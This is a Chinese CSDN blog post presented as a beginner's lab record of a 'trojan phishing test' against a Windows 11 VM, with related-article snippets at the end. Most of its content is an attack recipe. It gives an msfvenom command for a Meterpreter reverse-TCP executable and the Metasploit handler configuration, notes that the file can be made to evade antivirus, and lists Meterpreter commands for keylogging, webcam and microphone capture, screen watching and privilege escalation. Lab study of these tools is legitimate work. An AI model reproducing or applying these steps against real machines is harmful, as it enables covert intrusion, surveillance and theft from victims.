win11木马钓鱼测试(小白的学习记录,附详细图文过程)

最新推荐文章于 2024-05-15 10:34:58 发布
最新推荐文章于 2024-05-15 10:34:58 发布
阅读量516 收藏 4
点赞数 5
分类专栏: 网络安全 文章标签: 学习 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73967062/article/details/132717703
版权

本人技术小白学习过程中所发第一篇文章,请多多支持指导。

一、MSF简介

Msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。
MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。

渗透环境要求

使用Kali Linux虚拟机进行演示操作
攻击主机:Kali Linux虚拟机

目标靶机:Windows11

软件:Msfvenom、Msfconsole(Kali Linux系统内置)

二、渗透流程

1.Kali Linux进入Root模式并查看kali Linux虚拟机ip

不在Root模式下运行可能会出现操作者权限不够的提示,为了避免命令执行失败,第一步先将Kali进入Root管理员模式。执行命令之后输入Kali的密码时,密码是被隐藏的。

命令:sudo su

在这里插入图片描述

命令:ifconfig
在这里插入图片描述

2.生成可执行文件

命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128 LPORT=1234 -f exe -o muma.exe

接下来运行命令来生成可执行文件

在这里插入图片描述

把生成的可执行文件放入目标靶机Windows11中

3.运行msfconsole命令

命令:msfconsole

在这里插入图片描述

4.配置参数

(1)命令: use exploit/multi/handler(选择模块)
(2)命令: set payload windows/meterpreter/reverse_tcp(选择攻击模块)
(3)命令: set LhOST 192.168.189.128(填写自己主机的IP地址)
(4)命令: set LPORT 1234(填写刚才生成文件时写的端口号)
(5)命令: show options(查看设置参数)(Required项yes时为必填)
(6)命令: exploit -j(攻击在后台执行)
在这里插入图片描述

5.在靶机Windows11打开可执行文件

可以自行进行免杀模块或隐藏

win11打开muma.exe文件后
在这里插入图片描述

6.渗透

命令:sessions(查看上钩的目标靶机)

在这里插入图片描述

命令:sessions -i -1(选择要攻击的用户)

在这里插入图片描述

这个时候就已经成功了

7.测试

我们用放入系统命令 shell

在这里插入图片描述

8.meterpreter命令(转载自https://blog.csdn.net/RFZ_322/article/details/123367668 感谢大佬)

keyscan_start 开始捕获击键(开始键盘记录)
keyscan_dump 转储按键缓冲(下载键盘记录)
keyscan_stop 停止捕获击键(停止键盘记录)
record_mic X秒从默认的麦克风record_mic音频记录(音频录制)
webcam_chat 开始视频聊天(视频,对方会有弹窗)
webcam_list 单摄像头(查看摄像头列表)
webcam_snap 采取快照从指定的摄像头(摄像头拍摄一张照片)
webcam_stream 播放视频流从指定的摄像头(开启摄像头监控)
enumdesktops 列出所有可访问的桌面和窗口站(窗体列表)
getdesktop 得到当前的Meterpreter桌面
reboot 重新启动远程计算机
shutdown 关闭远程计算机
shell 放入系统命令 shell
enumdesktops 列出所有可访问的桌面和窗口站
getdesktop 获取当前的meterpreter桌面
idletime 返回远程用户空闲的秒数
keyboard_send 发送击键
keyevent 发送按键事件
keyscan_dump 转储击键缓冲区
keyscan_start 开始捕获击键
keyscan_stop 停止捕获击键
mouse 发送鼠标事件
screenshare 实时观看远程用户桌面
screenshot 抓取交互式桌面的屏幕截图
setdesktop 更改 Meterpreters 当前桌面
uictl 控制一些用户界面组件
record_mic 从默认麦克风录制音频 X 秒
webcam_chat 开始视频聊天
webcam_list 列出网络摄像头
webcam_snap 从指定的网络摄像头拍摄快照
webcam_stream 播放来自指定网络摄像头的视频流
play 在目标系统上播放波形音频文件 (.wav)
getsystem 尝试将您的权限提升到本地系统的权限
execute -f notepad 打开记事本

声明

本文所涉及内容仅供学习,任何人在利用本文相关内容时,所造成的相关违法行为引起的法律纠纷问题,本人概不负责。

道长道长6
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
木马程序的检测
05-08
可以轻松帮你搞定木马,并了解木马程序,学习木马程序。
反向连接木马测试源程序
06-26
本程序利用winsockAPI函数在vc下编程,监听对方主机某一指定端口,当对方主机尝试打开该端口即达到连接目的。不具有破坏性,只演示了winsock的使用,提供思路。
一次简单的渗透测试
skjie的博客
01-04 316
一次简单的渗透测试
如何使用kali来入侵(渗透)一台windows
zzz6583zz的博客
05-15 1328
工具:一台带有kali linux系统的虚拟机,一个聪明的大脑开始前我们先需要将kali虚拟机改为桥接网络模式,否则会导致渗透失败1.打开虚拟机,点击虚拟机2.点击设置3.点击网络适配器,看左边点击桥接模式,点击确定即可好了,现在我们就要正式渗透一个windows系统啦,兴不兴奋?1.打开虚拟机2.打开终端,输入sudo su进入root用户权限3.进入root权限后输入ifconfig查看本机ip地址,eth0旁边192开头的为本机ip。
内网渗透神器CobaltStrike之钓鱼攻击(六)
xf555er的博客
11-22 2841
office钓鱼在无需交互、用户无感知的情况下,执行Office文档中内嵌的一段恶意代码,从远控地址中下载并运行恶意可执行程序,例如远控木马或者勒索病毒等。Cobalt Strike office钓鱼主要方法是生成一段vba代码,然后将代码复制到office套件中,当用户启动office自动运行lnk文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用。lnk钓鱼主要将图标伪装成正常图标,但是目标会执行shell命令。
Kali使用Metasploit内、外网渗透windows系统
热门推荐
QQ670663的博客
02-17 2万+
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。 一、(内网渗透)内网英文缩写WAN;内网又称局域网 局域网的覆盖范围一般是方圆几千米之内,其具备的安装便捷、成本节约、扩展方便等特点使其在各类办公室内运用广泛。局域网可以实现文件管理、应用软件共享、打印机共享等功能,在使用过程当中,通过维护局域网网...
Metasploit联动CobaltStrike渗透win11主机并提权
Locosomnus的博客
04-01 1792
算是一个学习记录吧,很菜,欢迎大佬的骂
基于半监督深度学习木马流量检测方法
最新发布
07-13
【作品名称】:基于半监督深度学习木马流量检测方法 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】: 数据集 数据...
基于机器学习木马检测模型的设计与实现(论文)-kaic.docx
04-04
### 基于机器学习木马检测模型的设计与实现 #### 1. 研究背景 随着互联网技术的快速发展以及人们对网络的高度依赖,网络安全问题变得日益严峻。特别是JavaScript木马,它作为一种隐蔽性强、危害大的恶意软件,对...
指令级功耗特征的硬件木马检测高效机器学习.pdf
09-24
这篇论文主要探讨了使用指令级功耗特性进行硬件木马检测的高效机器学习方法。硬件木马(Hardware Trojans, HTs)是集成电路(IC)安全领域的一大威胁,由于半导体设计的全球化和制造外包,使得IC容易受到HTs的侵袭。...
木马详细解说,木马清除过程
11-12
很多对安全知识了解不多的菜鸟们,在计算机中了“木马”之后就束手无策了。虽然现在市面上有很多新版杀毒软件都可以自动清除大部分“木马”,但它们并不能防范新出现的“木马”程序。因此,查杀木马,最关键的还是要...
使用Metasploit入侵windows之自动扫描
08-07
Metasploit入侵windows之自动扫描方法
68-68.渗透测试-生成木马获取shell(Windows).mp4
05-10
68-68.渗透测试-生成木马获取shell(Windows).mp4
kali系统入侵电脑windows(win11系统)渗透测试,骇入电脑教学
这个博主不懒,但Ta什么也没写~(私信互关24小时必回)
01-27 5788
本次渗透测试将使用kali虚拟机(攻击机)对本机(靶机)进行入侵并监控屏幕。
kali linux渗透win11操作系统
2301_78519654的博客
12-27 731
msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的IP地址 LPORT=8888 -f exe -o win10.exe。第7步设置IP和端口号{端口号用你刚刚生成文件的那个端口号} {IP用你刚用ifconfig这个命令查出来的}我的是172.19.215.206。第3步在左边的终端输入以下命令并回车。第5步 在左边的输入一下命令并回车。第6步 在左边的输入一下命令并回车。第4步在左边的输入一下命令并回车。在右边的终端输入以下命令并回车。
【二进制安全】堆漏洞:Double Free原理
cc123489ll的博客
04-24 304
我们先不用管 修改已被释放的空闲块中的内容到底有什么用,我们现在只需要知道。
利用msf入侵电脑
weixin_44761350的博客
05-25 1173
msf
kail利用msf工具对ms11-003漏洞入侵渗透Win7
qq_50854662的博客
05-26 2049
前言: windows7IE溢出攻击 实验环境: 工具:metasploit 靶机两台:windows 7和kali2020 攻击机IP地址:10.20.29.129 被攻击机IP地址:10.20.29.134 步骤: 1、在kali里面打开metasploit漏洞利用框架 2、搜索ms11-003漏洞利用模块 3、使用利用模块use exploit/windows/browser/ms11_003_ie_css_import 4、设置payload set pay...
黑客瞄准韩国智库、2021年社交媒体网络钓鱼攻击猛增|11月12日全球网络安全热点
qcloud_security的博客
11-12 7136
安全资讯报告 勒索软件团伙使用“无情”的策略,以获得更大的回报 根据欧洲执法机构欧洲刑警组织的数据,仅在2019年至2020年之间,赎金支付的数量就增加了300%。网络犯罪分子以供应链、关键基础设施、医院等为目标的几起重大事件表明,成功的勒索软件攻击具有多么大的破坏性。 为了获得解密加密文件和服务器所需的解密密钥,许多成为勒索软件攻击受害者的组织将支付赎金,这可能会花费数百万美元的比特币或其他加密货币。网络犯罪分子并没有尝试大规模分发勒索软件并希望某些攻击能够成功,而是选择较少数量...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值